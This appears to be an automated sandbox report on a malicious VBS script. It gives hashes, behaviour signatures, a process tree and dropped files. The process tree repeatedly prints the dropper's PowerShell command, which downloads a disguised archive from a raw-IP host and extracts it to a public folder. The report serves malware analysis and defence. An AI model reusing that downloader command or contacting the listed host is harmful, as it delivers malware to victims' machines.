Resubmissions

12/03/2024, 14:32

240312-rwjvaada89 10

12/03/2024, 14:27

240312-rsqhnach88 10

Analysis

  • max time kernel
    350s
  • max time network
    705s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    12/03/2024, 14:32

General

  • Target

    g4.vbs

  • Size

    731B

  • MD5

    f82736dcca9ccf1e8460707f48f51478

  • SHA1

    2210fe31ae5e82413301a8e91bce03cf1eb14246

  • SHA256

    e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8

  • SHA512

    67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://104.243.44.136:777/moh.jpg

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2920
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2512
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://users/
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2452
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778
        2⤵
          PID:1764
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
          2⤵
            PID:1672
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
            2⤵
              PID:812
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
              2⤵
                PID:1540
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                2⤵
                  PID:1460
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                  2⤵
                    PID:1924
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
                    2⤵
                      PID:2756
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                      2⤵
                        PID:2408
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
                        2⤵
                          PID:1912
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                          2⤵
                            PID:816
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                            2⤵
                              PID:2772
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                              2⤵
                                PID:2876
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                                2⤵
                                  PID:2844
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                                  2⤵
                                    PID:2312
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
                                    2⤵
                                      PID:1268
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
                                      2⤵
                                        PID:2600
                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                      1⤵
                                        PID:2204
                                      • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
                                        1⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:300
                                      • C:\Windows\system32\NOTEPAD.EXE
                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
                                        1⤵
                                        • Opens file in notepad (likely ransom note)
                                        PID:1372
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"
                                        1⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2224
                                      • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
                                        1⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:320
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2636
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass
                                          2⤵
                                            PID:912
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
                                              3⤵
                                                PID:2512
                                          • C:\Windows\System32\notepad.exe
                                            "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"
                                            1⤵
                                            • Opens file in notepad (likely ransom note)
                                            PID:2672
                                          • C:\Windows\system32\NOTEPAD.EXE
                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt
                                            1⤵
                                            • Opens file in notepad (likely ransom note)
                                            PID:2852
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
                                            1⤵
                                              PID:412
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                              1⤵
                                                PID:2412
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                  2⤵
                                                    PID:2192
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                  1⤵
                                                    PID:2260
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                      2⤵
                                                        PID:1424
                                                    • C:\Windows\explorer.exe
                                                      "C:\Windows\explorer.exe"
                                                      1⤵
                                                        PID:2104
                                                      • C:\Windows\system32\AUDIODG.EXE
                                                        C:\Windows\system32\AUDIODG.EXE 0x4fc
                                                        1⤵
                                                          PID:2692
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                          1⤵
                                                            PID:1932
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                              2⤵
                                                                PID:2392
                                                            • C:\Windows\System32\CScript.exe
                                                              "C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                              1⤵
                                                                PID:1976
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                                  2⤵
                                                                    PID:1672
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                                  1⤵
                                                                    PID:2192
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                                      2⤵
                                                                        PID:2884
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                                      1⤵
                                                                        PID:1808
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                                          2⤵
                                                                            PID:2700
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                                          1⤵
                                                                            PID:2020
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
                                                                              2⤵
                                                                                PID:2620
                                                                            • C:\Windows\System32\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
                                                                              1⤵
                                                                                PID:1620
                                                                              • C:\Windows\System32\Notepad.exe
                                                                                "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs
                                                                                1⤵
                                                                                • Opens file in notepad (likely ransom note)
                                                                                PID:2900
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                                                1⤵
                                                                                  PID:1752
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
                                                                                  1⤵
                                                                                    PID:1872

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

                                                                                    Filesize

                                                                                    16B

                                                                                    MD5

                                                                                    aefd77f47fb84fae5ea194496b44c67a

                                                                                    SHA1

                                                                                    dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                                                    SHA256

                                                                                    4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                                                    SHA512

                                                                                    b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                    Filesize

                                                                                    264KB

                                                                                    MD5

                                                                                    f50f89a0a91564d0b8a211f8921aa7de

                                                                                    SHA1

                                                                                    112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                    SHA256

                                                                                    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                    SHA512

                                                                                    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                    Filesize

                                                                                    986B

                                                                                    MD5

                                                                                    0f4f741a30afcd13b686313d31ceaac3

                                                                                    SHA1

                                                                                    eb341e2203992dbb28d7f3deb4a444eb042e70c1

                                                                                    SHA256

                                                                                    42702e2d60b5d4319ff6fab128cb6585739e0de7080dd6f8ffe7502ef33d44da

                                                                                    SHA512

                                                                                    c9d06a1c933cf1152e1c08f58c9894b31d1d42726177b8b0cb63ba82d771a997f4f165d42c0b1367085ce422f842b77854d79dfa577761db9aefd4fe5de89583

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    901e0d6f7201a7be15fb48fd447fc052

                                                                                    SHA1

                                                                                    37142ec6982ed0d4a1785e3a6eb508c86d802a65

                                                                                    SHA256

                                                                                    f202496fa677af7806d28ca2922f268252dee7d4960b490cabe75ad0c0cd30a6

                                                                                    SHA512

                                                                                    1e304f8de325c960f9c6c7642703fc0188ac5c91e48022e8e79d33a6e0dfcfefc86cd5fd73fd79daae647d1644160c1e93255cea10d83603227f41ccd7d0dc1b

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    5KB

                                                                                    MD5

                                                                                    f3886cb2abbd410384d2e247c1a19520

                                                                                    SHA1

                                                                                    90f9e2b731fa513c1e86b638460df7d718ad0b07

                                                                                    SHA256

                                                                                    50dbdc0db6f0d6fdc0e792c2b2fcfef681c2d3c9f9c5f9ffe2e6a23dca06378b

                                                                                    SHA512

                                                                                    95bfaf449af0231d3dc60e7dcc5ef6e5f265db3ac29890533bdc592d2feff493796b7d058a477fbe3042362d0cc382c1e02bd77af51b6036137fd4f8b3fe5a54

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    cadd7e6cf4e00a0cb1eed886fabeea2d

                                                                                    SHA1

                                                                                    85253620e109ba0d4e8aa58e37e9fa23ee750ae5

                                                                                    SHA256

                                                                                    8a540158f7b0f8c5c459350aaeaca020a97d8339e87b87aa2295c1ddf8878ed7

                                                                                    SHA512

                                                                                    59adbac128efb40f9164fbee4f719cb73502bffacb86dd4e42cebe29704f05f7468bf7be99aa0453589695a22146106fb815e2df1c0c0bec6fef91fac9d81868

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    5KB

                                                                                    MD5

                                                                                    b233c62080702539447e5a72cdede799

                                                                                    SHA1

                                                                                    c2ff017b4be967a0646420e2a46a327779a2f1c9

                                                                                    SHA256

                                                                                    e549acf1a8b5e2d31a26c3694302a5b0c28f0cf51b3dae9960613ea0655ece41

                                                                                    SHA512

                                                                                    9471a6be1204970ed0968f72a2f7537a4c5c2284c6c87d1b149fe5b4178b581fc551a8c12839aace012336c65814c65f69dabe2e871262b35a5a8557bf17db5e

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    5KB

                                                                                    MD5

                                                                                    14cc8305ff7b6186efbae3b462fb60df

                                                                                    SHA1

                                                                                    1c2ace083e6a7a86956e6f890524c065b572878b

                                                                                    SHA256

                                                                                    734816f6f9791578d22c82213884a3cf8fa0b7ab83ee85fad9c5e6798d4bbe9e

                                                                                    SHA512

                                                                                    00e0521d2188a69b1829d43db7b4f55898a1b649295d0c9fb98d7be088e8585ec6af7feb2e1645edd349380373973a94ffa77a6b6a4f2205d13760a3a8789c5f

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    fa896589dc101569218d9554ad8cc547

                                                                                    SHA1

                                                                                    e4f98abc82cfb45b9deff5430f5bef716b2302cc

                                                                                    SHA256

                                                                                    a189c451f257e9c98f98a5a0bccb0f7c0877287ce59ef240341eac9480337db0

                                                                                    SHA512

                                                                                    681aaec310163a19cbbad82a6ce4133ffad1e2ec1ce400e5c9cb8ee65341174b5d0f4965f9321c2f9218374d3acd87349cb2e750449b2bc56b529d53476999cf

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                                                    Filesize

                                                                                    16B

                                                                                    MD5

                                                                                    18e723571b00fb1694a3bad6c78e4054

                                                                                    SHA1

                                                                                    afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                    SHA256

                                                                                    8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                    SHA512

                                                                                    43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ef61fcc9-be5e-439b-a380-392b8ddc9ac7.tmp

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    05705d148f14867cd4640a04eb817514

                                                                                    SHA1

                                                                                    adbf4fe123a665079de80164e90a87e3d70682af

                                                                                    SHA256

                                                                                    a1da84bf5b90d067dbe112810afa07a87d803398950b937c03816f1d1266198d

                                                                                    SHA512

                                                                                    89d9ea32df6661e912429110cb4d748195ec31a42913f23d8337df5d315f610558606ed7c14f934fa88b395f2376328514f93d6157cfbf334f9416920b133606

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                    Filesize

                                                                                    259KB

                                                                                    MD5

                                                                                    07d6a990d48d06a61fd3e7e83c1c1d1c

                                                                                    SHA1

                                                                                    da2e6cdc9a70a5da52655f3cb2b9f06071c07d5c

                                                                                    SHA256

                                                                                    7d06579813d4309157456e76d8b5cefc7efa4ed45bdc00e932323f4f361c4253

                                                                                    SHA512

                                                                                    1cd0eb1b9baa62208ad0e7c1ec34735e42dd9bc23c14ff72ba66795b6570eb3b706b609d27d144a628a37b2b7d9e67fcb222fd26d63a4dd537afafc573dadb4f

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                    Filesize

                                                                                    7KB

                                                                                    MD5

                                                                                    d5ab74ae398f2d9b648d5fe5c4779a91

                                                                                    SHA1

                                                                                    617ae2d562c55ab47608003f1625c7e06a3915a2

                                                                                    SHA256

                                                                                    af4f562ecaf11c4f71ac62fa6ca1cca2face95aaf247820b70ddd01e2d01284b

                                                                                    SHA512

                                                                                    b14b252d32a557c82b94020c87722e3cbc75afc688bcb3c492c9bc2a327da7906ef04efb05887f92e18569c825755ab8c862026aacc789e934dbf54c7cbb6dff

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    7559f17b255a8b1932e72a81a240096d

                                                                                    SHA1

                                                                                    386f4a21f8c8171e7c875ef809250be6633757cf

                                                                                    SHA256

                                                                                    519310fed8e699cf88dbef66e8aabeefda883555c49f50e58bd5a86bfb945eca

                                                                                    SHA512

                                                                                    8771d4599c8ac2ec316bb8e6799ea86e846a57ce4f49609b9ade73e264cbe4896d73cbd977c0195bb7e5702ef720da9cfae01b912d3aadb49a8632f88f0e888a

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRMODDT9PNEWFNRU6KTK.temp

                                                                                    Filesize

                                                                                    7KB

                                                                                    MD5

                                                                                    c35051a64ae0888a1ecd112759fc4fa4

                                                                                    SHA1

                                                                                    d029cd66ff74a8a6fa55d6b4addab696f6c8e97c

                                                                                    SHA256

                                                                                    bd4fd9e687b305ca5db9f8359a300a7fe2eb6236a09c0360c44043097d7d860a

                                                                                    SHA512

                                                                                    7fd21af965e6dd98025567cb07397c30c0efedd2d0fc453d0943274a12227350baf58c6825db85c739a797bf1dbf7357111eebc1a5f924aac4617c85b5a97d95

                                                                                  • C:\Users\Admin\Desktop\a.ps1

                                                                                    Filesize

                                                                                    729B

                                                                                    MD5

                                                                                    7b064a6209f893bdd49ee27ab509e271

                                                                                    SHA1

                                                                                    d4cc84e215cd2b35a2241298d1782d7873399f72

                                                                                    SHA256

                                                                                    9c3f6def8ce4f73c49f861a191e7e3e36f0e9759de9bda8b0f79ca895decb8c7

                                                                                    SHA512

                                                                                    5f347947dbb13a5fc96c581308e0da8d9a217f4cc413a0c5fd0a216e1c6c96e789e7abd2ec1128a0b01ac6edf78b60097bca60b3ccff22aa89df23b168f875e2

                                                                                  • C:\Users\Admin\Desktop\a.vbs

                                                                                    Filesize

                                                                                    735B

                                                                                    MD5

                                                                                    3c15cc7a6587bd5a38b2f3695f5fdd70

                                                                                    SHA1

                                                                                    5eb07663b508cc6288514b9d55c0bff2db78f679

                                                                                    SHA256

                                                                                    6227ddc0d33925e3981078595fa50d52819b3cab35f2800bc81eb0860ad726a3

                                                                                    SHA512

                                                                                    15bd0a4fb9c76121441b648a9256a16c5c7bcd3e7d84f36a3107934256f0b27da59c14738fd8becabee531ed0efee58feb0322ec36f277a4b3c11350f8bc3168

                                                                                  • C:\Users\Admin\Desktop\aaa.vbs

                                                                                    Filesize

                                                                                    545B

                                                                                    MD5

                                                                                    94d9f0f40db24e05f57932150c193171

                                                                                    SHA1

                                                                                    cc52620223564a1a5a8855edc9b86ef196b57be2

                                                                                    SHA256

                                                                                    95eda985122dc3d7bc221b0fcef20eeb77503bb0bfa7fd5896fd511c4ddbb888

                                                                                    SHA512

                                                                                    edd628f6276656d0769f6b1c54e8c26efaa8b0fab334fe64df66c65cc86bb2c71b15b137c2373ac00a027841961c77f75ee712f3cd142e5fea3c6a211c6afcd0

                                                                                  • memory/300-183-0x0000000002C20000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    512KB

                                                                                  • memory/300-199-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/300-181-0x0000000002C20000-0x0000000002CA0000-memory.dmp

